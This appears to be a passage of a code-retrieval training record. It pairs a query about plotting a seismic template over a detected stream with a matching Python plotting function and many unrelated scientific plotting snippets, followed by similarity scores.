Nsteps)\n spins = xy.spinVectors()\n\n # Now plot the result.\n plt.figure(1)\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n plt.title(\"XY model sample ($L = {:d}$ and $\\\\beta = $ {:0.1f})\".format(L, beta))\n plt.xlabel('$\\\\vec{\\\\sigma}_x$')\n plt.ylabel('$\\\\vec{\\\\sigma}_y$')\n plt.axis('equal')\n plt.xlim([-1, 1])\n plt.ylim([-1, 1])\n plt.plot(spins[:,0], spins[:,1], 'bo')\n plt.plot(circle[0], circle[1], 'k:')", "def random(self=None, sample=100, min=0, max=100):\r\n\t\treturn DataStatistics([randint(min, max) for i in range(sample)])", "def inclass1():\n import numpy as np\n import matplotlib.pyplot as plt\n\n\n N = 50\n x = np.random.rand(N)\n y = np.random.rand(N)\n colors = np.random.rand(N)\n area = np.pi * (15 * np.random.rand(N))**2 # 0 to 15 point radiuses\n\n plt.scatter(x, y, s=area, c=colors, alpha=0.5)\n plt.show()", "def labelledCube(self, dim=None, sample=None):\n if dim is None:\n dim = self.D\n if sample is None:\n sample = range(1, int(self.poolSize)+1)\n \n all_labels = list(it.product(*(range(self.slices),) * dim))\n self.sample_labels = set(random.sample(all_labels, k= len(sample)))\n labelled_sample = {label : sample for label, sample in zip(self.sample_labels, sample)}\n self.text[\"labelledSamples\"] = labelled_sample\n return labelled_sample", "def get_sample(config, n_sample=1):\n if config['distribution'] == 'binary':\n data = np.random.choice([0, 1], size=n_sample, replace=True, p=config['pmf'])\n\n elif config['distribution'] == 'discrete':\n data = np.random.choice(config['category'], size=n_sample, replace=True, p=config['pmf'])\n\n elif config['distribution'] == 'uniform':\n assert float(config['min']) < float(config['max'])\n data=np.random.uniform(low=float(config['min']),high=float(config['max']),size=n_sample)\n\n elif config['distribution'] == 'gaussian':\n data=np.random.normal(loc=float(config['mean']),scale=float(config['std']),size=n_sample)\n data = np.maximum(data, float(config['min']))\n data = np.minimum(data, float(config['max']))\n\n elif config['distribution'] == 'uniform_int':\n if int(config['min'])==int(config['max']):\n data=int(config['min'])*np.ones((n_sample,),dtype='int32')\n else:\n data=np.random.randint(int(config['min']),high=int(config['max']),size=n_sample)\n\n else:\n log.warning('Warning: unknown distribution type: %s' % config['distribution'])\n data = []\n\n return data", "def test_sampler():\n L = 25 # Lattice size\n beta = 10.0 # Inverse temperature\n h = 1E-2 # Step size\n Nsteps = int(1E4) # Number of MCMC steps\n\n # First plot the spins on the circle for large beta.\n\n # Get points on the circle.\n angle = np.linspace(0, 2*np.pi, 1000)\n circle = [np.cos(angle), np.sin(angle)]\n\n # Sample from the model and get the spin vectors.\n xy = sampleXY(L, beta, h, Nsteps)\n spins = xy.spinVectors()\n\n # Now plot the result.\n plt.figure(1)\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n plt.title(\"XY model sample ($L = {:d}$ and $\\\\beta = $ {:0.1f})\".format(L, beta))\n plt.xlabel('$\\\\vec{\\\\sigma}_x$')\n plt.ylabel('$\\\\vec{\\\\sigma}_y$')\n plt.axis('equal')\n plt.xlim([-1, 1])\n plt.ylim([-1, 1])\n plt.plot(spins[:,0], spins[:,1], 'bo')\n plt.plot(circle[0], circle[1], 'k:')\n\n # Now plot the spins for small beta.\n beta = 0.1 # Inverse temperature\n\n # Sample from the model and get the spin vectors.\n xy = sampleXY(L, beta, h, Nsteps)\n spins = xy.spinVectors()\n\n # Now plot the result.\n plt.figure(2)\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n plt.title(\"XY model sample ($L = {:d}$ and $\\\\beta = $ {:0.1f})\".format(L, beta))\n plt.xlabel('$\\\\vec{\\\\sigma}_x$')\n plt.ylabel('$\\\\vec{\\\\sigma}_y$')\n plt.axis('equal')\n plt.xlim([-1, 1])\n plt.ylim([-1, 1])\n plt.plot(spins[:,0], spins[:,1], 'bo')\n plt.plot(circle[0], circle[1], 'k:')", "def sample(self):\r\n raise NotImplementedError", "def plot_data(samples, datafield):\n points = [{\n 'name': sample.lims_id,\n 'y': getattr(sample, datafield),\n } for sample in samples]\n return points", "def sample(self, n=1):\n raise NotImplementedError", "def __call__(self, samples_number):\n self.sampler.sample(samples_number)", "def tst_random_set():\n final_wave, final_spec, final_z = desi_qso_templates(\n outfil='test_random_set.fits', N_perz=100, seed=12345)", "def fetch_examples_in_db(self, cat_choice):\n ten_examples = []\n product_choice_id = 0\n self.cur.execute(\"SELECT id FROM Product WHERE nova = 4 AND category = %s\",\n (self.categories[cat_choice], ))\n examples = self.cur.fetchall()\n for i in range (0, 10):\n ten_examples.append(examples[random.randint(0, len(examples))][0])\n for i, element in enumerate(ten_examples):\n print (\"Choix n°{}\".format(i+1))\n self.display_product_from_id(element)\n\n print (\"Veuillez choisir le produit que vous voulez substituer:\")\n product_choice = self.secure_input(1, len(ten_examples))\n self.product_choice_id = ten_examples[product_choice-1]\n self.fetch_substitutes(cat_choice)", "def sample_from_concept(self):\n return random.choice(self.active_concept.extension)", "def sample_rides(df, nSample):\n return df.iloc[numpy.random.choice(df.index.values, nSample)]" ]
[ "0.66966414", "0.65395725", "0.6370684", "0.6370684", "0.63241494", "0.63104224", "0.6130251", "0.5980402", "0.59737", "0.5940193", "0.5889786", "0.58694214", "0.5850805", "0.5846972", "0.5820033", "0.581082", "0.5789322", "0.57852453", "0.5775959", "0.5773435", "0.5740156", "0.56807977", "0.56638354", "0.5624795", "0.5591308", "0.55438626", "0.553558", "0.5520163", "0.55136865", "0.55100244", "0.54962987", "0.5475792", "0.5442217", "0.542961", "0.54156053", "0.5375769", "0.5366779", "0.536335", "0.53586763", "0.53466356", "0.5346605", "0.5339839", "0.5339006", "0.5328322", "0.5325167", "0.53247696", "0.5311137", "0.53108054", "0.52761924", "0.52756226", "0.5258675", "0.5255063", "0.52535284", "0.52472335", "0.52428776", "0.52363783", "0.5225844", "0.522368", "0.5221444", "0.52199906", "0.5219327", "0.5217921", "0.5213972", "0.52127844", "0.52069515", "0.5201249", "0.52006143", "0.5199953", "0.5196588", "0.5191507", "0.51850444", "0.5183959", "0.5183004", "0.51828766", "0.5182124", "0.5182124", "0.51727694", "0.5169659", "0.5160622", "0.51579374", "0.5147979", "0.51426953", "0.5141455", "0.5141361", "0.5138158", "0.51361954", "0.5135497", "0.51249355", "0.51206505", "0.51181626", "0.5116491", "0.5114775", "0.5112976", "0.5111149", "0.5108922", "0.51058227", "0.5097532", "0.50974166", "0.50965255", "0.5096116" ]
0.6025946
7
Plot a template over a detected stream, with picks corrected by lagcalc.
def plot_repicked(template, picks, det_stream, size=(10.5, 7.5), save=False, savefile=None, title=False): # _check_save_args(save, savefile) fig, axes = plt.subplots(len(det_stream), 1, sharex=True, figsize=size) if len(template) > 1: axes = axes.ravel() mintime = det_stream.sort(['starttime'])[0].stats.starttime template.sort(['network', 'station', 'starttime']) lengths = [] lines = [] labels = [] n_templates_plotted = 0 for i, tr in enumerate(det_stream.sort(['starttime'])): # Cope with a single channel template case. if len(det_stream) > 1: axis = axes[i] else: axis = axes tr_picks = [pick for pick in picks if pick.waveform_id.station_code == tr.stats.station and pick.waveform_id.channel_code[0] + pick.waveform_id.channel_code[-1] == tr.stats.channel[0] + tr.stats.channel[-1]] if len(tr_picks) > 1: msg = 'Multiple picks on channel %s' % tr.stats.station + ', ' + \ tr.stats.channel raise NotImplementedError(msg) if len(tr_picks) == 0: msg = 'No pick for chanel %s' % tr.stats.station + ', ' + \ tr.stats.channel print(msg) else: pick = tr_picks[0] pick_delay = pick.time - mintime delay = tr.stats.starttime - mintime y = tr.data # Normalise if len(tr_picks) > 0 and template: y /= max(abs(y[int(pick_delay/tr.stats.delta):int(pick_delay/tr.stats.delta) + len(template[0])])) else: y /= max(abs(y)) x = np.linspace(0, (len(y) - 1) * tr.stats.delta, len(y)) x += delay axis.plot(x, y, 'k', linewidth=1.5) axis.set_ylim(-max(abs(y)), max(abs(y))) if template.select(station=tr.stats.station, channel=tr.stats.channel): btr = template.select(station=tr.stats.station, channel=tr.stats.channel)[0] bdelay = pick.time - mintime by = btr.data by /= max(abs(by)) bx = np.linspace(0, (len(by) - 1) * btr.stats.delta, len(by)) bx += bdelay if len(tr_picks) > 0: # Heads up for the x - 0.1 fudge factor here accounting for template pre-pick time template_line, = axis.plot(bx - 0.1, by, 'r', linewidth=1.6, label='Template') if not pick.phase_hint: pcolor = 'k' label = 'Unknown pick' elif 'P' in pick.phase_hint.upper(): pcolor = 'red' label = 'P-pick' elif 'S' in pick.phase_hint.upper(): pcolor = 'blue' label = 'S-pick' else: pcolor = 'k' label = 'Unknown pick' pdelay = pick.time - mintime ccval = pick.comments[0].text.split('=')[-1] line = axis.axvline(x=pdelay, color=pcolor, linewidth=2, linestyle='--', label=label) axis.text(pdelay, max(by), ccval, fontsize=12) if label not in labels: lines.append(line) labels.append(label) if n_templates_plotted == 0: lines.append(template_line) labels.append('Template') n_templates_plotted += 1 lengths.append(max(bx[-1], x[-1])) else: lengths.append(bx[1]) axis.set_ylabel('.'.join([tr.stats.station, tr.stats.channel]), rotation=0, horizontalalignment='right') axis.yaxis.set_ticks([]) if len(det_stream) > 1: axis = axes[len(det_stream) - 1] else: axis = axes axis.set_xlabel('Time (s) from %s' % mintime.datetime.strftime('%Y/%m/%d %H:%M:%S.%f')) plt.figlegend(lines, labels, 'upper right') if title: if len(template) > 1: axes[0].set_title(title) else: axes.set_title(title) else: plt.subplots_adjust(top=0.98) plt.tight_layout() plt.subplots_adjust(hspace=0) if not save: plt.show() plt.close() else: plt.savefig(savefile) plt.close() return fig
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def xx_plot(epoch, model, features, filters, figname, fgal=0.5):\n # fetch Stripe 82 data\n X, Xcov = fetch_prepped_s82data(epoch, fgal, features, filters)\n Xcoadd, Xcoaddcov = fetch_prepped_s82data(epoch, fgal, features,\n filters, use_single=False)\n N = 20000\n X = X[:N]\n Xcov = Xcov[:N]\n Xcoadd = Xcoadd[:N]\n Xcoaddcov = Xcoaddcov[:N]\n\n # unpickle the XD model\n if type(model) == str: \n f = open(model, 'rb')\n model = cPickle.load(f)\n f.close()\n\n # Calculate the posteriors, draw samples\n a, m, v = model.posterior(X, Xcov)\n posts = np.zeros_like(X)\n for i in range(X.shape[0]):\n posts[i] = model.sample(a[i], m[i], v[i], size=1)\n\n lo = [0.01, 0.02, 0.06]\n hi = [0.99, 0.96, 0.98]\n idx = [0, 1, 4]\n bins = [100, 100, 300]\n label = ['psfmag $r$', 'modelmag $u-g$', 'modelmag $i-z$']\n N = len(idx)\n fs = 5\n lsize = 20\n f = pl.figure(figsize=(N * fs, 2 * fs))\n pl.subplots_adjust(wspace=0.3)\n for i in range(N):\n x = X[:, idx[i]]\n y = Xcoadd[:, idx[i]]\n p = posts[:, idx[i]]\n ind = (y > -999) & (Xcoaddcov[:, idx[i]][:, idx[i]] < 10.)\n x = x[ind]\n y = y[ind]\n p = p[ind]\n ax = pl.subplot(2, N, i + 1)\n v = np.sort(x)\n mn, mx = v[np.int(lo[i] * x.shape[0])], v[np.int(hi[i] * x.shape[0])]\n hist2d(x, y, ax=ax, bins=bins[i], plot_contours=True,\n plot_datapoints=True)\n pl.plot([mn, mx], [mn, mx], 'r', lw=2)\n pl.ylabel('Coadd ' + label[i], fontsize=lsize)\n pl.xlabel('Single Epoch ' + label[i], fontsize=lsize)\n pl.xlim(mn, mx)\n pl.ylim(mn, mx)\n ax = pl.subplot(2, N, i + 4)\n hist2d(p, y, ax=ax, bins=bins[i], plot_contours=True,\n plot_datapoints=True)\n pl.plot([mn, mx], [mn, mx], 'r', lw=2)\n pl.xlim(mn, mx)\n pl.ylim(mn, mx)\n pl.ylabel('Coadd ' + label[i], fontsize=lsize)\n pl.xlabel('XD Posterior ' + label[i], fontsize=lsize)\n f.savefig(figname, bbox_inches='tight')", "def makePlot(timeStamp):\n\n #-------------------------------------------------------------------------\n # Create figure and axes\n #-------------------------------------------------------------------------\n\n width = 12 # inches\n height = 8 # inches\n fig = plt.figure(figsize=(width, height))\n\n # We'll use gridspec to create axes in rectangular 6-by-5 lattice\n import matplotlib.gridspec as gridspec\n nrows = 6\n ncols = 5\n Grid = gridspec.GridSpec(nrows, ncols)\n\n # axis for elevation time series\n axElev = fig.add_subplot(Grid[:2, :2]) # first 2 rows, first 2 columns\n # axis for slab\n axSlab = fig.add_subplot(Grid[:2, 2:]) # first 2 rows, columns > 2\n # and the transects\n axTran1 = fig.add_subplot(Grid[2:4, :]) # rows 2,3,4, all columns\n # rows 5,6,7, all columns, share x/y axis with previous (sets same ticks\n # etc)\n axTran2 = fig.add_subplot(Grid[4:6, :], sharex=axTran1, sharey=axTran1)\n\n # gridspec allows to tune the spacing between plots (unit is fraction of\n # font size)\n boundary_pad = 3.5\n horizontal_pad = 0.2\n vertical_pad = 1.0\n # figure area left,bottom,right,top in normalized coordinates [0,1]\n bounds = [0, 0, 1, 1]\n Grid.tight_layout(\n fig,\n pad=boundary_pad,\n w_pad=horizontal_pad,\n h_pad=vertical_pad,\n rect=bounds)\n\n #-------------------------------------------------------------------------\n # Create plots\n #-------------------------------------------------------------------------\n\n # for all avaiable colormaps see ( '_r' reverses the colormap )\n # http://matplotlib.org/examples/color/colormaps_reference.html\n colormap = plt.get_cmap('Spectral_r')\n colormap_kine = plt.get_cmap('gist_heat')\n\n # slab\n salt_clim = [0, 32]\n ncontours = 16\n # bouding box for slab [xmin,xmax,ymin,ymax] in model x,y coordinates\n estuarybbox = [330000, 360000, 284500, 297500]\n dia = slabSnapshotDC(\n clabel='Salinity',\n unit='psu',\n clim=salt_clim,\n cmap=colormap)\n dia.setAxes(axSlab)\n dia.addSample(slabDC, timeStamp=timeStamp, plotType='contourf',\n bbox=estuarybbox, N=ncontours)\n # overrides default format for colorbar floats\n dia.showColorBar(format='%.2g')\n #dia.addTitle('in case you want a custom title')\n # get transect (x,y) coordinates from the transectDC\n transectXYCoords = generateTransectFromDataContainer(transectDC_salt, 0)[4]\n # plot transect on the map (thin black on thick white)\n dia.addTransectMarker(transectXYCoords[:, 0], transectXYCoords[:, 1],\n color='w', linewidth=2.0)\n dia.addTransectMarker(transectXYCoords[:, 0], transectXYCoords[:, 1],\n color='k', linewidth=1.0)\n # plot station markers\n for station in stationsToPlot:\n staX = staFileObj.getX(station)\n staY = staFileObj.getY(station)\n dia.addStationMarker(\n staX,\n staY,\n label=station,\n printLabel=True,\n marker='*')\n # add text to plot. x,y are in normalized axis coordinates [0,1]\n dia.ax.text(0.05, 0.98, 'custom text', fontsize=fontsize,\n verticalalignment='top', horizontalalignment='left',\n transform=dia.ax.transAxes)\n\n # elevation time series\n # define the time range to plot\n elevStartTime = datetime.datetime(2012, 5, 4, 0, 0)\n elevEndTime = datetime.datetime(2012, 5, 5, 0, 15)\n elevMeanTime = elevStartTime + (elevEndTime - elevStartTime) / 2\n elevLim = [-1.5, 2.5]\n dia = timeSeriesPlotDC2(\n xlabel=elevMeanTime.strftime('%Y %b %d'),\n ylim=elevLim)\n dia.setAxes(axElev)\n #dia.addShadedRange( timeStamp, timeStamp+datetime.timedelta(seconds=30), facecolor='IndianRed')\n dia.addShadedRange(\n timeStamp,\n timeStamp,\n edgecolor='IndianRed',\n facecolor='none',\n linewidth=2)\n tag = elevDC.getMetaData('tag')\n dia.addSample(\n elevDC.timeWindow(\n elevStartTime,\n elevEndTime),\n label=tag,\n color='k')\n dia.addTitle('Elevation ({0:s}) [m]'.format(\n elevDC.getMetaData('location').upper()))\n # adjust the number of ticks in x/y axis\n dia.updateXAxis(maxticks=5)\n dia.updateYAxis(maxticks=3, prune='lower')\n\n # transects\n dia = transectSnapshotDC(\n clabel='Salinity',\n unit='psu',\n cmap=colormap,\n clim=salt_clim)\n dia.setAxes(axTran1)\n #transectDC_salt.data *= 1e-3\n dia.addSample(transectDC_salt, timeStamp, N=ncontours)\n dia.addTitle('')\n dia.showColorBar()\n # plot station markers\n for station in stationsToPlot:\n staX = staFileObj.getX(station)\n staY = staFileObj.getY(station)\n dia.addStationMarker(staX, staY, label=station, color='k',\n linewidth=1.5, linestyle='dashed')\n # do not show x axis ticks and label for this plot\n dia.hideXTicks()\n\n dia = transectSnapshotDC(clabel='TKE', unit='m2s-1', logScale=True,\n clim=[-7, -2], climIsLog=True, cmap=colormap_kine)\n dia.setAxes(axTran2)\n dia.addSample(transectDC_kine, timeStamp, N=ncontours)\n # plot station markers\n for station in stationsToPlot:\n staX = staFileObj.getX(station)\n staY = staFileObj.getY(station)\n dia.addStationMarker(staX, staY, label=station, color='k',\n linewidth=1.5, linestyle='dashed')\n dia.addTitle('')\n dia.showColorBar()\n dia.updateXAxis(maxticks=15)\n dia.updateYAxis(maxticks=6)\n\n #-------------------------------------------------------------------------\n # Save to disk\n #-------------------------------------------------------------------------\n dateStr = timeStamp.strftime('%Y-%m-%d_%H-%M')\n filename = '_'.join([imgPrefix, dateStr])\n saveFigure(\n imgDir,\n filename,\n imgFiletype,\n verbose=True,\n dpi=200,\n bbox_tight=True)\n plt.close()", "def plot_vanHove_dt(comp,conn,start,step_size,steps):\n \n (fin,) = conn.execute(\"select fout from comps where comp_key = ?\",comp).fetchone()\n (max_step,) = conn.execute(\"select max_step from vanHove_prams where comp_key = ?\",comp).fetchone()\n Fin = h5py.File(fin,'r')\n g = Fin[fd('vanHove',comp[0])]\n\n temp = g.attrs['temperature']\n dtime = g.attrs['dtime']\n\n\n # istatus = plots.non_i_plot_start()\n \n fig = mplt.figure()\n fig.suptitle(r'van Hove dist temp: %.2f dtime: %d'% (temp,dtime))\n dims = figure_out_grid(steps)\n \n plt_count = 1\n outs = []\n tmps = []\n for j in range(start,start+step_size*steps, step_size):\n (edges,count,x_lim) = _extract_vanHove(g,j+1,1,5)\n if len(count) < 50:\n plt_count += 1\n continue\n #count = count/np.sum(count)\n \n sp_arg = dims +(plt_count,)\n ax = fig.add_subplot(*sp_arg)\n ax.grid(True)\n\n \n alpha = _alpha2(edges,count)\n \n ax.set_ylabel(r'$\\log{P(N)}$')\n ax.step(edges,np.log((count/np.sum(count))),lw=2)\n ax.set_title(r'$\\alpha_2 = %.2f$'%alpha + ' j:%d '%j )\n ax.set_xlim(x_lim)\n plt_count += 1\n\n mplt.draw()\n\n # plots.non_i_plot_start(istatus)\n\n del g\n Fin.close()\n del Fin", "def show(self, fig=None):\n i = 0\n # for t = 0:obj.step_size:obj.duration\n # TODO: make a generator?\n iterator = np.linspace(0, self.duration(), num=math.ceil(self.duration() / self.step_precision) + 1)\n tfInterp_l = np.zeros((4, 4, len(iterator)))\n tfInterp_r = np.zeros((4, 4, len(iterator)))\n for t in iterator:\n [lfp, rfp] = self.footPosition(t)\n tfInterp_l[:, :, i] = lfp\n tfInterp_r[:, :, i] = rfp\n i = i + 1\n\n self.show_tf(fig, tfInterp_l, len(iterator))\n self.show_tf(fig, tfInterp_r, len(iterator))", "def show_template_bundles(final_streamlines, template_path, fname):\n import nibabel as nib\n from fury import actor, window\n\n renderer = window.Renderer()\n template_img_data = nib.load(template_path).get_data().astype(\"bool\")\n template_actor = actor.contour_from_roi(\n template_img_data, color=(50, 50, 50), opacity=0.05\n )\n renderer.add(template_actor)\n lines_actor = actor.streamtube(\n final_streamlines, window.colors.orange, linewidth=0.3\n )\n renderer.add(lines_actor)\n window.record(renderer, n_frames=1, out_path=fname, size=(900, 900))\n return", "def plot(self):\n\n # initialize outside the loop to avoid memory leak\n\n plot_a = None\n\n # initial plotting scales\n vmin = 0\n vmax = 0\n pmin = 0\n pmax = 0\n\n sr = self.dio.get_properties(self.channel)['samples_per_second']\n\n if self.control.verbose:\n print 'sample rate: ', sr\n\n # initial time info\n display_lag = 60\n b = self.dio.get_bounds(self.channel)\n\n if self.control.verbose:\n print 'data bounds: ', b\n\n if self.control.start:\n dtst0 = dateutil.parser.parse(self.control.start)\n st0 = (dtst0 - datetime.datetime(1970, 1,\n 1, tzinfo=pytz.utc)).total_seconds()\n st0 = int(st0 * sr)\n else:\n st0 = int(b[0])\n\n if self.control.end:\n dtst0 = dateutil.parser.parse(self.control.end)\n et0 = (dtst0 - datetime.datetime(1970, 1,\n 1, tzinfo=pytz.utc)).total_seconds()\n et0 = int(et0 * sr)\n else:\n et0 = int(b[1])\n\n if self.control.verbose:\n\n print 'start sample st0: ', st0\n print 'end sample et0: ', et0\n\n blocks = self.control.bins * self.control.frames\n\n samples_per_stripe = self.control.num_fft * \\\n self.control.integration * self.control.decimation\n total_samples = blocks * samples_per_stripe\n\n if total_samples > (et0 - st0):\n print 'Insufficient samples for %d samples per stripe and %d blocks between %ld and %ld' % (samples_per_stripe, blocks, st0, et0)\n return\n\n stripe_stride = (et0 - st0) / blocks\n\n bin_stride = stripe_stride / self.control.bins\n\n start_sample = st0\n\n print 'first ', start_sample\n\n # get metadata\n # this could be done better to ensure we catch frequency or sample rate\n # changes\n mdt = self.dio.read_metadata(st0, et0, self.channel)\n try:\n md = mdt[mdt.keys()[0]]\n cfreq = md['center_frequencies'].ravel()[self.sub_channel]\n except (IndexError, KeyError):\n cfreq = 0.0\n\n if self.control.verbose:\n print 'processing info : ', self.control.frames, self.control.bins, samples_per_stripe, bin_stride\n\n for p in numpy.arange(self.control.frames):\n sti_psd_data = numpy.zeros(\n [self.control.num_fft, self.control.bins], numpy.float)\n sti_times = numpy.zeros([self.control.bins], numpy.complex128)\n\n for b in numpy.arange(self.control.bins):\n\n if self.control.verbose:\n print 'read vector :', self.channel, start_sample, samples_per_stripe\n\n d_vec = self.dio.read_vector(\n start_sample, samples_per_stripe, self.channel)\n data = d_vec[:, self.sub_channel]\n\n if self.control.decimation > 1:\n data = scipy.signal.decimate(data, self.control.decimation)\n sample_freq = sr / self.control.decimation\n else:\n sample_freq = sr\n\n if self.control.mean:\n detrend_fn = matplotlib.mlab.detrend_mean\n else:\n detrend_fn = matplotlib.mlab.detrend_none\n\n try:\n psd_data, freq_axis = matplotlib.mlab.psd(\n data, NFFT=self.control.num_fft, Fs=float(sample_freq), detrend=detrend_fn, scale_by_freq=False)\n except:\n traceback.print_exc(file=sys.stdout)\n\n sti_psd_data[:, b] = numpy.real(\n 10.0 * numpy.log10(numpy.abs(psd_data) + 1E-12))\n\n sti_times[b] = start_sample / sr\n\n start_sample += stripe_stride\n\n # Now Plot the Data\n ax = self.subplots[p]\n\n # determine image x-y extent\n extent = (\n 0,\n self.control.bins,\n numpy.min(freq_axis) / 1e3,\n numpy.max(freq_axis) / 1e3,\n )\n\n # determine image color extent in log scale units\n Pss = sti_psd_data\n vmin = numpy.real(numpy.median(Pss) - 6.0)\n vmax = numpy.real(numpy.median(\n Pss) + (numpy.max(Pss) - numpy.median(Pss)) * 0.61803398875 + 50.0)\n\n if self.control.zaxis:\n vmin = int(string.split(self.control.zaxis, ':')[0])\n vmax = int(string.split(self.control.zaxis, ':')[1])\n else:\n vmin = numpy.real(numpy.median(Pss) - 6.0)\n vmax = numpy.real(numpy.median(\n Pss) + (numpy.max(Pss) - numpy.median(Pss)) * 0.61803398875 + 50.0)\n\n im = ax.imshow(sti_psd_data, cmap='jet', origin='lower', extent=extent,\n interpolation='nearest', vmin=vmin, vmax=vmax, aspect='auto')\n\n ax.set_ylabel('f (kHz)', fontsize=8)\n\n # plot dates\n\n tick_spacing = numpy.arange(\n self.control.bins / 8, self.control.bins, self.control.bins / 8)\n ax.set_xticks(tick_spacing)\n tick_labels = []\n\n for s in tick_spacing:\n tick_time = sti_times[s]\n\n if tick_time == 0:\n tick_string = ''\n else:\n gm_tick_time = time.gmtime(numpy.real(tick_time))\n tick_string = '%02d:%02d:%02d' % (\n gm_tick_time[3], gm_tick_time[4], gm_tick_time[5])\n tick_labels.append(tick_string)\n\n ax.set_xticklabels(tick_labels)\n\n # set the font sizes\n tl = ax.get_xticklabels()\n\n for tk in tl:\n tk.set_size(8)\n del tl\n\n tl = ax.get_yticklabels()\n\n for tk in tl:\n tk.set_size(8)\n del tl\n\n print 'last ', start_sample\n\n # create a time stamp\n start_time = st0 / sr\n srt_time = time.gmtime(start_time)\n sub_second = int(round((start_time - int(start_time)) * 100))\n\n timestamp = \"%d-%02d-%02d %02d:%02d:%02d.%02d UT\" % (srt_time[0], srt_time[\n 1], srt_time[2], srt_time[3], srt_time[4], srt_time[5], sub_second)\n\n self.f.suptitle('%s %s %4.2f MHz (%s)' % (\n self.control.title, timestamp, cfreq / 1E6, self.control.path), fontsize=10)\n\n # ax.legend(fontsize=8)\n ax.set_xlabel('time (UTC)', fontsize=8)\n\n # fixup ticks\n\n tl = ax.get_xticklabels()\n for tk in tl:\n tk.set_size(8)\n del tl\n tl = ax.get_yticklabels()\n for tk in tl:\n tk.set_size(8)\n del tl\n\n self.gridspec.update()\n\n self.f.tight_layout()\n\n self.f.subplots_adjust(top=0.95, right=0.88)\n cax = self.f.add_axes([0.9, 0.12, 0.02, 0.80])\n self.f.colorbar(im, cax=cax)\n if self.control.outname:\n fname, ext = os.path.splitext(self.control.outname)\n if ext == '':\n ext = '.png'\n print \"Save plot as {}\".format(fname+ext)\n matplotlib.pyplot.savefig(fname+ext)\n if self.control.appear or not self.control.outname:\n print \"Show plot\"\n matplotlib.pyplot.show()", "def plotTI():\n min_dl = dlam[dlam != 0].min()\n S = int(0.4/min_dl)\n fig = pl.figure(figsize = (8,6))\n ax = fig.add_subplot(1,1,1)\n ax.spines['bottom'].set_position('zero')\n ax.spines['top'].set_color('none')\n ax.spines['right'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n for k, spine in ax.spines.items():\n spine.set_zorder(12.2)\n\n xs, ndx, dx = [0], 0, 0.001\n colors = ['r', 'g', '#7F38EC', '#9F000F', 'b', 'y']\n min_y, max_y = 0, 0\n\n lines = tuple()\n ## lv_names2 = [r'$Coulomb$', r'$vdWaals$'] ## for the paper\n lv_names2 = []\n for j in range(n_components):\n y = ave_dhdl[:,j]\n if not (y == 0).all():\n lv_names2.append(r'$%s$' % P.lv_names[j].capitalize())\n\n for j in range(n_components):\n\n y = ave_dhdl[:,j]\n if not (y == 0).all():\n\n # Get the coordinates.\n lj = lchange[:,j]\n x = lv[:,j][lj]\n y = y[lj]/P.beta_report\n\n if 'TI' in P.methods:\n # Plot the TI integration area.\n ss = 'TI'\n for i in range(len(x)-1):\n min_y = min(y.min(), min_y)\n max_y = max(y.max(), max_y)\n #pl.plot(x,y)\n if i%2==0:\n pl.fill_between(x[i:i+2]+ndx, 0, y[i:i+2], color=colors[ndx], alpha=1.0)\n else:\n pl.fill_between(x[i:i+2]+ndx, 0, y[i:i+2], color=colors[ndx], alpha=0.5)\n xlegend = [-100*wnum for wnum in range(len(lv_names2))]\n pl.plot(xlegend, [0*wnum for wnum in xlegend], ls='-', color=colors[ndx], label=lv_names2[ndx]) ## for the paper\n\n if 'TI-CUBIC' in P.methods and not cubspl[j]==0:\n # Plot the TI-CUBIC interpolation curve.\n ss += ' and TI-CUBIC'\n xnew = numpy.arange(0, 1+dx, dx)\n ynew = cubspl[j].interpolate(y, xnew)\n min_y = min(ynew.min(), min_y)\n max_y = max(ynew.max(), max_y)\n pl.plot(xnew+ndx, ynew, color='#B6B6B4', ls ='-', solid_capstyle='round', lw=3.0)\n\n else:\n # Plot the TI-CUBIC integration area.\n ss = 'TI-CUBIC'\n for i in range(len(x)-1):\n xnew = numpy.arange(x[i], x[i+1]+dx, dx)\n ynew = cubspl[j].interpolate(y, xnew)\n ynew[0], ynew[-1] = y[i], y[i+1]\n min_y = min(ynew.min(), min_y)\n max_y = max(ynew.max(), max_y)\n if i%2==0:\n pl.fill_between(xnew+ndx, 0, ynew, color=colors[ndx], alpha=1.0)\n else:\n pl.fill_between(xnew+ndx, 0, ynew, color=colors[ndx], alpha=0.5)\n\n # Store the abscissa values and update the subplot index.\n xs += (x+ndx).tolist()[1:]\n ndx += 1\n\n # Make sure the tick labels are not overcrowded.\n xs = numpy.array(xs)\n dl_mat = numpy.array([xs-i for i in xs])\n ri = range(len(xs))\n\n def getInd(r=ri, z=[0]):\n primo = r[0]\n min_dl=ndx*0.02*2**(primo>10)\n if dl_mat[primo].max()<min_dl:\n return z\n for i in r:\n for j in range(len(xs)):\n if dl_mat[i,j]>min_dl:\n z.append(j)\n return getInd(ri[j:], z)\n\n xt = [i if (i in getInd()) else '' for i in range(K)]\n pl.xticks(xs[1:], xt[1:], fontsize=10)\n pl.yticks(fontsize=10)\n #ax = pl.gca()\n #for label in ax.get_xticklabels():\n # label.set_bbox(dict(fc='w', ec='None', alpha=0.5))\n\n # Remove the abscissa ticks and set up the axes limits.\n for tick in ax.get_xticklines():\n tick.set_visible(False)\n pl.xlim(0, ndx)\n min_y *= 1.01\n max_y *= 1.01\n pl.ylim(min_y, max_y)\n\n for i,j in zip(xs[1:], xt[1:]):\n pl.annotate(('%.2f' % (i-1.0 if i>1.0 else i) if not j=='' else ''), xy=(i, 0), xytext=(i, 0.01), size=10, rotation=90, textcoords=('data', 'axes fraction'), va='bottom', ha='center', color='#151B54')\n if ndx>1:\n lenticks = len(ax.get_ymajorticklabels()) - 1\n if min_y<0: lenticks -= 1\n if lenticks < 5:\n from matplotlib.ticker import AutoMinorLocator as AML\n ax.yaxis.set_minor_locator(AML())\n pl.grid(which='both', color='w', lw=0.25, axis='y', zorder=12)\n pl.ylabel(r'$\\mathrm{\\langle{\\frac{ \\partial U } { \\partial \\lambda }}\\rangle_{\\lambda}\\/%s}$' % P.units, fontsize=20, color='#151B54')\n pl.annotate('$\\mathit{\\lambda}$', xy=(0, 0), xytext=(0.5, -0.05), size=18, textcoords='axes fraction', va='top', ha='center', color='#151B54')\n if not P.software.title()=='Sire':\n lege = ax.legend(prop=FP(size=14), frameon=False, loc=1)\n for l in 